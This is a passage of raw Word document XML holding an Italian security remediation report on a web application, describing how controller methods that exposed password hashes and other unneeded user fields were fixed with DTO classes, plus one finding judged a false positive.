        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6269708B" w14:textId="4A4B603C" w:rsidR="00093E39" w:rsidRDefault="00093E39" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54D39F0A" w14:textId="77E03411" w:rsidR="003A418E" w:rsidRDefault="00872EF7" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="71375523" wp14:editId="6F3A7924">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>95885</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6297930" cy="820124"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="351575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7930" cy="820124"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB101A1" w14:textId="450BFC70" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40FD0101" w14:textId="04E4929F" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E1ECF51" w14:textId="48980A4D" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51AD9091" w14:textId="1B86D45C" w:rsidR="003A418E" w:rsidRDefault="00872EF7" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="00FF467B" wp14:editId="1E8D9EDF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>125730</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5608320" cy="983780"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:wrapNone/>
            <wp:docPr id="71542340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320" cy="983780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ADE5A1" w14:textId="2668BF7D" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4852D453" w14:textId="77777777" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5037D5C6" w14:textId="77777777" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C4DC133" w14:textId="6616D199" w:rsidR="00093E39" w:rsidRDefault="00093E39" w:rsidP="00467BBC"/>
    <w:p w14:paraId="16A73190" w14:textId="77777777" w:rsidR="00467BBC" w:rsidRDefault="00467BBC" w:rsidP="00467BBC">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Unexpected property leakage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E174258" w14:textId="35DB1DEF" w:rsidR="00B04DA2" w:rsidRDefault="00B04DA2" w:rsidP="00872EF7">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">getBusinessDetails(): nella classe UserController è stato modificato il metodo poiché inviava alla rete informazioni sensibili non necessarie, tra cui l’hash della password. L’algoritmo di hash utilizzato è </w:t>
      </w:r>
      <w:r w:rsidR="002A0868">
        <w:t>BCrypt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> che è attualmente difficile da </w:t>
      </w:r>
      <w:r w:rsidR="00370316">
        <w:t>attaccare; quindi,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> non </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>si può scoprire la password, almeno per il momento. Ma le informazioni sensibili possono essere usate per fare altri attacchi e sono un problema per la privacy. Per risolvere è stata introdotta una classe DTO dove sono presenti solo gli attributi necessari.</w:t>
      </w:r>
      <w:r w:rsidR="00872EF7">
        <w:t xml:space="preserve"> In particolare sono stati rimossi i campi id, password, roles e hobby_offers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E52B125" w14:textId="16D73524" w:rsidR="00B04DA2" w:rsidRDefault="00872EF7" w:rsidP="002A0868">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C7B11B7" wp14:editId="00E45F4C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-38100</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>109855</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6408420" cy="1548026"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="146940736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8420" cy="1548026"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB2EF5E" w14:textId="26BA33F5" w:rsidR="00B04DA2" w:rsidRDefault="00B04DA2" w:rsidP="002A0868">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F9A8860" w14:textId="4E886BFE" w:rsidR="002A0868" w:rsidRDefault="002A0868" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B30CEFE" w14:textId="68C1293E" w:rsidR="002A0868" w:rsidRDefault="002A0868" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E608DF5" w14:textId="55582F33" w:rsidR="002A0868" w:rsidRDefault="00872EF7" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2AB6984E" wp14:editId="602C1D65">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>21590</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>203200</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6454140" cy="3630741"/>
            <wp:effectExtent l="0" t="0" r="3810" b="8255"/>
            <wp:wrapNone/>
            <wp:docPr id="51880655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54140" cy="3630741"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0E8E49" w14:textId="15B62528" w:rsidR="002A0868" w:rsidRDefault="002A0868" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB08791" w14:textId="294C0E4C" w:rsidR="002A0868" w:rsidRDefault="002A0868" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13974C05" w14:textId="5C946B49" w:rsidR="002A0868" w:rsidRDefault="002A0868" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35A3310D" w14:textId="64303BF5" w:rsidR="002A0868" w:rsidRDefault="002A0868" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="468C7857" w14:textId="77777777" w:rsidR="002A0868" w:rsidRDefault="002A0868" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E3E9D62" w14:textId="2FBDFF7D" w:rsidR="002A0868" w:rsidRDefault="002A0868" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="793B8B8D" w14:textId="1759E889" w:rsidR="002A0868" w:rsidRPr="002A0868" w:rsidRDefault="002A0868" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C5A60B8" w14:textId="2A0511D9" w:rsidR="00467BBC" w:rsidRDefault="00467BBC" w:rsidP="00467BBC">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19AC2626" w14:textId="2DB385EE" w:rsidR="00467BBC" w:rsidRDefault="00872EF7" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C10B41E" wp14:editId="25438855">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>320040</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6883400" cy="3646805"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="106754621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3400" cy="3646805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="548ABD1F" w14:textId="4A3D535A" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5BC89317" w14:textId="7895EE50" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2D4776F7" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3CD47B60" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="64034F63" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="79E6A195" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4CEB978F" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0BC2785B" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="35739046" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="50F9114E" w14:textId="77777777" w:rsidR="00C46E60" w:rsidRDefault="00C46E60" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2E2559D5" w14:textId="77777777" w:rsidR="00B019CE" w:rsidRDefault="00B019CE" w:rsidP="00B019CE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Unexpected property leakage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459CD01D" w14:textId="019D25F8" w:rsidR="0031586D" w:rsidRDefault="00B019CE" w:rsidP="00B019CE">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>showUserDetail() in UserController.java: stesso problema delle altre, ci sono degli attributi superflui</w:t>
      </w:r>
      <w:r w:rsidR="00872EF7">
        <w:t xml:space="preserve"> e sono id, roles, password, testResults, hobby_matches e saved_hobbies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F593019" w14:textId="69A6F820" w:rsidR="00DE4795" w:rsidRPr="00B019CE" w:rsidRDefault="00872EF7" w:rsidP="00B019CE">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="165BB312" wp14:editId="4589E207">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1270</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5654040" cy="4472637"/>
            <wp:effectExtent l="0" t="0" r="3810" b="4445"/>
            <wp:wrapNone/>
            <wp:docPr id="180608545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r="35730"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5654040" cy="44726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B180D" w14:textId="0F9BDE2C" w:rsidR="00C46E60" w:rsidRDefault="00C46E60" w:rsidP="00467BBC"/>
    <w:p w14:paraId="12CABBAD" w14:textId="77777777" w:rsidR="00C46E60" w:rsidRDefault="00C46E60" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1995A426" w14:textId="3DC1AB1A" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2722E44A" w14:textId="2681DD41" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="184249BF" w14:textId="18590FF4" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0E5E55B0" w14:textId="303F7105" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1B5D0A6B" w14:textId="3E07B80C" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5BA7A514" w14:textId="77777777" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="23CA3955" w14:textId="77777777" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="288BB1F2" w14:textId="0E046671" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4A17FD67" w14:textId="4DA35649" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4A735AF0" w14:textId="63757178" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7CD6AC1A" w14:textId="2B8F068D" w:rsidR="004B30FC" w:rsidRDefault="00872EF7" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="79E47239" wp14:editId="1199F840">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>165735</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6172200" cy="4366260"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="139758385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6040" r="38613" b="5227"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6172200" cy="436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D2CED9" w14:textId="1A5A6780" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6E80240B" w14:textId="50AF42C3" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="529A6689" w14:textId="11C7B6BA" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2F06AE0E" w14:textId="3DABF8F0" w:rsidR="008302E7" w:rsidRDefault="008302E7" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5EF5D10A" w14:textId="1456797C" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0A8E797C" w14:textId="4E796E80" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5BA4E0BD" w14:textId="52DA2192" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="62938621" w14:textId="4A37B941" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6005DA7C" w14:textId="341E750B" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="007FE7B7" w14:textId="31B0C2AE" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="150630D5" w14:textId="60F20AF3" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5CC301E4" w14:textId="556FA86B" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="064359E7" w14:textId="063AE4BA" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0C35DEE0" w14:textId="50AE0B5B" w:rsidR="004B30FC" w:rsidRDefault="008302E7" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="481CFBE8" wp14:editId="1EF90209">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-412115</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6781175" cy="1790700"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38945517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81175" cy="1790700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C6D90C" w14:textId="247D11FF" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="74433AFB" w14:textId="2B28C5C9" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2D8A3B9E" w14:textId="347077DF" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="33ED1CD4" w14:textId="1D61EC2C" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7E79B2CD" w14:textId="77777777" w:rsidR="008302E7" w:rsidRDefault="008302E7" w:rsidP="008302E7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Unexpected property leakage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298E3047" w14:textId="45FF27D6" w:rsidR="00443F7A" w:rsidRDefault="00443F7A" w:rsidP="008302E7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>save() in HobbyController.java: false positive perché tutti gli attributi dell’oggetto vengono utilizzati. (è stata sistemata la save nel frontend perché non prendeva l’id dell’hobbie, altrimenti non si salvava).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EA6284" w14:textId="5D6F89C9" w:rsidR="004B30FC" w:rsidRPr="008302E7" w:rsidRDefault="00443F7A" w:rsidP="008302E7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6D100131" wp14:editId="33DC5A79">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>45720</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6438760" cy="1569720"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="89307933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8760" cy="15697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7CC2DE22" w14:textId="77777777" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="137912CA" w14:textId="77777777" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="762695C1" w14:textId="77777777" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1ABF2F98" w14:textId="365F199F" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="769EA1AA" w14:textId="342934CE" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0924143A" w14:textId="2BDB9A81" w:rsidR="004B30FC" w:rsidRDefault="00DE4795" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C95475C" wp14:editId="709691C1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>85725</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7003351" cy="3657469"/>
            <wp:effectExtent l="0" t="0" r="7620" b="635"/>
            <wp:wrapNone/>
            <wp:docPr id="339331680"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03351" cy="3657469"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DED50F7" w14:textId="7FEFD57A" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="09040E19" w14:textId="17FB9FB6" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="67CB8DC1" w14:textId="2B002749" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="287206B1" w14:textId="3BF957E6" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
